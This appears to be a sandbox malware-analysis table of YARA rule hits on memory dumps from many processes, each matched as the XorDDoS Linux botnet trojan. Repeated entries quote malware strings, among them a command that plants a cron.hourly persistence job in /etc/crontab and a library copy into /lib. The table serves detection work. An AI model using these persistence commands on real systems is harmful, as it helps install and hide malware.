9816.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9816.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9816.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10324.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10324.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10324.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10324.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9563.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9563.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9563.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9563.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9926.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9926.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9926.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9926.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9871.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9871.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9871.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9871.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10247.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10247.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10247.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10247.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10115.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10115.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10115.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10115.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10214.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10214.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10214.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10214.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9596.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9596.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9596.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9596.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10192.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10192.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10192.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10192.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9794.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9794.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9794.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9794.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9695.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9695.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9695.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9695.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10390.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10390.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10390.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10390.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9706.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9706.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9706.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9706.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10137.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10137.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10137.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10137.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9640.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9640.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9640.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9640.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9552.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9552.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9552.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9552.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9457.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9457.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9457.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9457.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10379.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10379.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10379.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10379.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9915.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9915.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9915.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9915.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9728.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9728.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9728.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9728.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10082.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10082.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10082.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10082.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10313.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10313.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10313.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
